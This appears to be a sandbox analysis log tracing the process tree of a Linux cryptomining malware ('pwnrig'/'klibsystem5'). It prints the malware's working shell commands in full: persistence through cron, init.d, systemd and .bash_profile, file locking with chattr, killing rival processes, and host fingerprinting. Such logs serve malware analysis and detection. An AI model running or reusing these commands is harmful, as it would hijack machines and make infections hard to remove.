sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
3⤵
PID:4281

/usr/bin/id
id -u
4⤵
PID:4282

/usr/bin/nohup
nohup ./klibsystem5
1⤵
PID:1713

/usr/bin/klibsystem5
./klibsystem5
1⤵
PID:1713

/usr/bin/hostname
hostname -I
1⤵
PID:1804

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:1806

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:1811

/usr/bin/head
head -n 1
1⤵
PID:1810

/usr/bin/grep
grep "Port "
1⤵
PID:1809

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:1808

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:1820

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:1819

/usr/bin/cut
cut -d: -f2
1⤵
PID:1818

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:1817

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:1823

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:1826

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:1829

/usr/bin/hostname
hostname -I
1⤵
- Attempts to change immutable files
PID:2141

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2143

/usr/bin/head
head -n 1
1⤵
PID:2147

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:2148

/usr/bin/grep
grep "Port "
1⤵
PID:2146

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:2145

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:2157

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:2156

/usr/bin/cut
cut -d: -f2
1⤵
PID:2155

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:2154

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2160

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2163

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2166

/usr/bin/grep
grep -- "-bash[[:space:]]*\$"
1⤵
PID:2191

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
1⤵
PID:2192

/usr/bin/grep
grep -v grep
1⤵
PID:2190

/usr/bin/wc
wc -l
1⤵
PID:2193

/usr/bin/ps
ps aux
1⤵
PID:2189

/usr/bin/crontab
crontab -r
1⤵
PID:2394

/usr/bin/pkill
pkill -f .klibsystem5
1⤵
- Reads runtime system information
PID:2395

/usr/bin/pkill
pkill -f .klibsystem4
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:2396

/usr/bin/bash
bash -c "echo \"* * * * * /usr/local/share/.klibsystem5 >/dev/null 2>&1\" | crontab -"
1⤵
PID:2397

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2399

/usr/bin/chattr
chattr -ia /etc/cron.d/.lib-knlib4
1⤵
PID:2400

/usr/bin/chattr
chattr +ia /etc/cron.d/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:2401

/usr/bin/chattr
chattr -ia /var/spool/cron/.lib-knlib4
1⤵
PID:2402

/usr/bin/chattr
chattr +ia /var/spool/cron/.lib-knlib4
1⤵
PID:2403

/usr/bin/chattr
chattr -ia /etc/cron.hourly/.lib-knlib4
1⤵
PID:2404

/usr/bin/chattr
chattr +ia /etc/cron.hourly/.lib-knlib4
1⤵
PID:2405

/usr/bin/chattr
chattr -ia /etc/cron.daily/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:2406

/usr/bin/chattr
chattr +ia /etc/cron.daily/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:2407

/usr/bin/chattr
chattr -ia /etc/cron.weekly/.lib-knlib4
1⤵
PID:2408

/usr/bin/chattr
chattr +ia /etc/cron.weekly/.lib-knlib4
1⤵
PID:2409

/usr/bin/chattr
chattr -ia /etc/cron.monthly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:2410

/usr/bin/chattr
chattr +ia /etc/cron.monthly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:2411

/usr/bin/chattr
chattr -ia /etc/anacrontab
1⤵
- Attempts to change immutable files
PID:2412

/usr/bin/chattr
chattr +ia /etc/anacrontab
1⤵
PID:2413

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:2414

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
2⤵
- Attempts to change immutable files
PID:2415

/usr/bin/whoami
whoami
3⤵
PID:2426

/usr/bin/hostname
hostname
3⤵
PID:2427

/usr/bin/grep
grep -c "^processor" /proc/cpuinfo
3⤵
- Checks CPU configuration
PID:2428

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
2⤵
PID:2444

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
3⤵
PID:2446

/usr/bin/ps
ps -A "-ostat,ppid"
3⤵
PID:2445

/usr/bin/id
id -u
3⤵
PID:2448

/usr/bin/grep
grep -v grep
3⤵
PID:2451

/usr/bin/grep
grep /etc/cron
3⤵
PID:2450

/usr/bin/ps
ps x
3⤵
- Reads runtime system information
PID:2449

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
2⤵
- Attempts to change immutable files
- Writes file to tmp directory
PID:2453

/usr/bin/id
id -u
3⤵
PID:2454

/usr/bin/id
id -u
3⤵
PID:2455

/usr/bin/chattr
chattr -i -a /bin/bprofr "~/.bash_profile"
3⤵
PID:2456

/usr/bin/rm
rm -rf /bin/bprofr
3⤵
PID:2457

/usr/bin/sed
sed -i /bprofr/d "~/.bash_profile"
3⤵
PID:2458

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/bprofr
3⤵
- Writes file to system bin folder
PID:2459

/usr/bin/id
id -u
3⤵
PID:2460

/usr/bin/chattr
chattr +i +a /bin/bprofr "~/.bash_profile"
3⤵
PID:2461

/usr/bin/mkdir
mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
3⤵
PID:2462

/usr/bin/chattr
chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
3⤵
PID:2463

/usr/bin/rm
rm -rf /bin/crondr
3⤵
PID:2464

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/crondr
3⤵
- Writes file to system bin folder
PID:2465

/usr/bin/tee
tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
3⤵
- Creates/modifies Cron job
PID:2467

/usr/bin/sed
sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
3⤵
- Creates/modifies Cron job
PID:2468

/usr/bin/chmod
chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
3⤵
PID:2469

/usr/bin/chattr
chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
3⤵
PID:2470

/usr/bin/which
which chkconfig
3⤵
PID:2471

/usr/bin/which
which update-rc.d
3⤵
PID:2472

/usr/bin/chattr
chattr -i -a /etc/init.d/pwnrig /bin/initdr
3⤵
PID:2473

/usr/sbin/update-rc.d
update-rc.d -f pwnrig disable
3⤵
- Flushes firewall rules
PID:2474

/usr/local/sbin/systemctl
systemctl --quiet disable pwnrig
4⤵
PID:2475

/usr/local/bin/systemctl
systemctl --quiet disable pwnrig
4⤵
PID:2475

/usr/sbin/systemctl
systemctl --quiet disable pwnrig
4⤵
PID:2475

/usr/bin/systemctl
systemctl --quiet disable pwnrig
4⤵
- Reads EFI boot settings
PID:2475

/usr/local/sbin/systemctl
systemctl daemon-reload
4⤵
PID:2501

/usr/local/bin/systemctl
systemctl daemon-reload
4⤵
PID:2501

/usr/sbin/systemctl
systemctl daemon-reload
4⤵
PID:2501

/usr/bin/systemctl
systemctl daemon-reload
4⤵
- Reads EFI boot settings
PID:2501

/usr/sbin/update-rc.d
update-rc.d -f pwnrig remove
3⤵
PID:2527

/usr/local/sbin/systemctl
systemctl daemon-reload
4⤵
PID:2528

/usr/local/bin/systemctl
systemctl daemon-reload
4⤵
PID:2528

/usr/sbin/systemctl
systemctl daemon-reload
4⤵
PID:2528

/usr/bin/systemctl
systemctl daemon-reload
4⤵
- Reads EFI boot settings
PID:2528

/usr/bin/rm
rm -rf /bin/initdr
3⤵
PID:2554

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/initdr
3⤵
- Writes file to system bin folder
PID:2555

/usr/bin/tee
tee /etc/init.d/pwnrig
3⤵
- Modifies init.d
PID:2557

/usr/bin/sed
sed -i "1 s/-e //" /etc/init.d/pwnrig
3⤵
- Modifies init.d
PID:2558

/usr/bin/chmod
chmod +x /etc/init.d/pwnrig /bin/initdr
3⤵
PID:2559

/usr/sbin/update-rc.d
update-rc.d pwnrig defaults
3⤵
PID:2560

/usr/local/sbin/systemctl
systemctl daemon-reload
4⤵
PID:2561

/usr/local/bin/systemctl
systemctl daemon-reload
4⤵
PID:2561

/usr/sbin/systemctl
systemctl daemon-reload
4⤵
PID:2561

/usr/bin/systemctl
systemctl daemon-reload
4⤵
- Reads EFI boot settings
PID:2561

/usr/sbin/update-rc.d
update-rc.d pwnrig enable
3⤵
PID:2600

/usr/local/sbin/systemctl
systemctl --quiet enable pwnrig
4⤵
PID:2601

/usr/local/bin/systemctl
systemctl --quiet enable pwnrig
4⤵
PID:2601

/usr/sbin/systemctl
systemctl --quiet enable pwnrig
4⤵
PID:2601

/usr/bin/systemctl
systemctl --quiet enable pwnrig
4⤵
PID:2601

/usr/local/sbin/systemctl
systemctl daemon-reload
4⤵
PID:2602

/usr/local/bin/systemctl
systemctl daemon-reload
4⤵
PID:2602

/usr/sbin/systemctl
systemctl daemon-reload
4⤵
PID:2602

/usr/bin/systemctl
systemctl daemon-reload
4⤵
- Reads EFI boot settings
PID:2602

/usr/bin/chattr
chattr +i +a /etc/init.d/pwnrig /bin/initdr
3⤵
- Attempts to change immutable files
PID:2628

/usr/bin/which
which systemctl
3⤵
PID:2629

/usr/bin/chattr
chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
3⤵
- Attempts to change immutable files
PID:2630

/usr/bin/rm
rm -rf /bin/sysdr
3⤵
PID:2631

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/sysdr
3⤵
- Writes file to system bin folder
PID:2632

/usr/bin/tee
tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
3⤵
- Modifies systemd
PID:2634

/usr/bin/sed
sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
3⤵
PID:2635

/usr/bin/chattr
chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
3⤵
PID:2636

/usr/bin/systemctl
systemctl enable pwnrige.service
3⤵
- Reads EFI boot settings
PID:2637

/usr/bin/systemctl
systemctl enable pwnrigl.service
3⤵
PID:2663

/usr/bin/systemctl
systemctl daemon-reload
3⤵
PID:2689

/usr/bin/systemctl
systemctl reload-or-restart pwnrige.service
3⤵
- Reads EFI boot settings
PID:2717

/usr/bin/hostname
hostname -I
1⤵
PID:2418

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2420

/usr/bin/grep
grep "Port "
1⤵
PID:2423

/usr/bin/head
head -n 1
1⤵
PID:2424

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:2425

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:2422

/usr/bin/cut
cut -d: -f2
1⤵
PID:2432

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:2433

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:2434

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:2431

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2437

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2440

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2443

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2774

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
2⤵
PID:2798

/usr/bin/whoami
whoami
3⤵
PID:2809

/usr/bin/hostname
hostname
3⤵
PID:2810

/usr/bin/grep
grep -c "^processor" /proc/cpuinfo
3⤵
- Checks CPU configuration
PID:2811

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
2⤵
PID:2827

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
3⤵
PID:2829

/usr/bin/ps
ps -A "-ostat,ppid"
3⤵
- Reads CPU attributes
PID:2828

/usr/bin/id
id -u
3⤵
PID:2831

/usr/bin/grep
grep -v grep
3⤵
PID:2834

/usr/bin/grep
grep /etc/cron
3⤵
PID:2833

/usr/bin/ps
ps x
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:2832

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
2⤵
PID:2836

/usr/bin/id
id -u
3⤵
PID:2837

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
3⤵
PID:2842

/usr/bin/grep
grep -v /usr/sbin/httpd
3⤵
PID:2841

/usr/bin/grep
grep -v -- "-bash[[:space:]]*\$"
3⤵
PID:2840

/usr/bin/grep
grep -v grep
3⤵
PID:2839

/usr/bin/ps
ps aux
3⤵
- Reads CPU attributes
PID:2838

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
2⤵
PID:2844

/usr/bin/id
id -u
3⤵
PID:2845

/usr/bin/hostname
hostname -I
1⤵
- Attempts to change immutable files
PID:2801

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2803

/usr/bin/grep
grep "Port "
1⤵
PID:2806

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:2808

/usr/bin/head
head -n 1
1⤵
PID:2807

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:2805

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:2817

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:2816

/usr/bin/cut
cut -d: -f2
1⤵
PID:2815

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:2814

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2820

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2823

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2826

/usr/bin/wc
wc -l
1⤵
PID:2851

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
1⤵
PID:2850

/usr/bin/grep
grep -- "-bash[[:space:]]*\$"
1⤵
PID:2849

/usr/bin/grep
grep -v grep
1⤵
PID:2848

/usr/bin/ps
ps aux
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:2847

/tmp/sys-helper
/tmp/sys-helper
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:2852

/usr/bin/crontab
crontab -r
1⤵
PID:2853

/usr/bin/pkill
pkill -f .klibsystem5
1⤵
- Reads CPU attributes
PID:2854

/usr/bin/pkill
pkill -f .klibsystem4
1⤵
- Reads CPU attributes
PID:2855

/usr/bin/bash
bash -c "echo \"* * * * * /var/run/.klibsystem5 >/dev/null 2>&1\" | crontab -"
1⤵
PID:2856

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2858

/usr/bin/chattr
chattr -ia /etc/cron.d/.lib-knlib4
1⤵
PID:2859

/usr/bin/chattr
chattr +ia /etc/cron.d/.lib-knlib4
1⤵
PID:2860

/usr/bin/chattr
chattr -ia /var/spool/cron/.lib-knlib4
1⤵
PID:2861

/usr/bin/chattr
chattr +ia /var/spool/cron/.lib-knlib4
1⤵
PID:2862

/usr/bin/chattr
chattr -ia /etc/cron.hourly/.lib-knlib4
1⤵
